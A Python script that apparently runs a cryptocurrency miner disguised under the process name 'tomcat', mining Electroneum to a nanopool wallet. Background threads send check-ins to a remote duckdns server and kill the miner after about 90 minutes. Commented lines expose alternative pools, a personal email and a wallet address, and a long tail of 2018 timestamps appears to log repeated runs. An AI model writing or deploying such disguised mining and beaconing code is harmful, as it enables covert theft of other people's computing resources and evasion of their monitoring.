import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:05.805192
#2018-02-17 17:37:06.072216
#2018-02-17 19:25:01.590901
#2018-02-17 21:15:06.793890
#2018-02-17 22:59:07.131047
#2018-02-18 00:47:06.095128
#2018-02-18 02:34:06.315424
#2018-02-18 04:21:02.119824
#2018-02-18 06:12:01.299358
#2018-02-18 08:02:06.611399
#2018-02-18 09:50:01.628982
#2018-02-18 11:37:07.081853
#2018-02-18 13:22:05.622744
#2018-02-18 15:12:04.598156
#2018-02-18 17:01:03.818335
#2018-02-18 18:48:01.285468
#2018-02-18 20:34:07.076694
#2018-02-18 22:20:08.151141
#2018-02-19 00:09:06.398615
#2018-02-19 01:55:04.363794
#2018-02-19 03:41:08.144675
#2018-02-19 05:26:03.978835
#2018-02-19 07:14:02.152337
#2018-02-19 09:01:07.869613
#2018-02-19 10:49:06.701045
#2018-02-19 12:38:09.124673
#2018-02-19 14:27:08.757621
#2018-02-19 16:16:07.496157
#2018-02-19 18:02:06.324564
#2018-02-19 19:48:05.846214
#2018-02-19 21:35:05.864823
#2018-02-19 23:21:05.050309
#2018-02-20 01:07:05.082345
#2018-02-20 02:56:05.700715
#2018-02-20 04:45:07.108153
#2018-02-20 06:29:06.258796
#2018-02-20 08:14:08.367716
#2018-02-20 10:00:04.562775
#2018-02-20 11:44:06.258125
#2018-02-20 13:32:09.264426
#2018-02-20 15:16:10.044303
#2018-02-20 17:01:11.761120
#2018-02-20 18:49:10.368466
#2018-02-20 20:40:09.813585
#2018-02-20 22:26:05.909282
#2018-02-21 00:08:07.751067
#2018-02-21 01:55:05.031570
#2018-02-21 03:43:08.175400
#2018-02-21 05:31:07.635022
#2018-02-21 07:20:07.935180
#2018-02-21 09:04:06.143610
#2018-02-21 10:52:04.960933
#2018-02-21 12:38:08.508093
#2018-02-21 14:27:05.386598
#2018-02-21 16:14:05.313452
#2018-02-21 18:04:05.610765
#2018-02-21 19:52:04.715431
#2018-02-21 21:38:04.861978
#2018-02-21 23:26:04.699070
#2018-02-22 01:16:01.546355
#2018-02-22 03:04:04.545491
#2018-02-22 04:49:05.732799
#2018-02-22 06:34:07.492712
#2018-02-22 08:22:04.883530
#2018-02-22 10:10:01.918191
#2018-02-22 11:54:01.390905
#2018-02-22 13:38:09.002077
#2018-02-22 15:26:05.214574
#2018-02-22 17:13:07.815831
#2018-02-22 18:59:02.133287
#2018-02-22 20:51:08.099733
#2018-02-22 22:38:05.167573
#2018-02-23 00:24:01.239760
#2018-02-23 02:12:04.611249
#2018-02-23 04:03:01.265337
#2018-02-23 05:48:08.658522
#2018-02-23 07:46:08.192388
#2018-02-23 09:50:06.033978
#2018-02-23 11:54:07.515556
#2018-02-23 13:42:08.956391
#2018-02-23 15:31:04.500173
#2018-02-23 17:20:09.022247
#2018-02-23 19:04:01.745698
#2018-02-23 20:49:06.407314
#2018-02-23 22:37:01.703577
#2018-02-24 00:23:05.024499
#2018-02-24 02:15:06.600310
#2018-02-24 04:05:05.889445
#2018-02-24 05:50:06.984676
#2018-02-24 07:40:06.981366
#2018-02-24 09:25:06.512886
#2018-02-24 11:19:04.286051
#2018-02-24 13:08:06.843128
#2018-02-24 14:59:07.040451
#2018-02-24 16:49:01.330757
#2018-02-24 18:37:03.763014
#2018-02-24 20:27:06.918724
#2018-02-24 22:22:04.144219
#2018-02-25 01:29:07.108455
#2018-02-25 05:25:08.621419
#2018-02-25 11:35:07.040677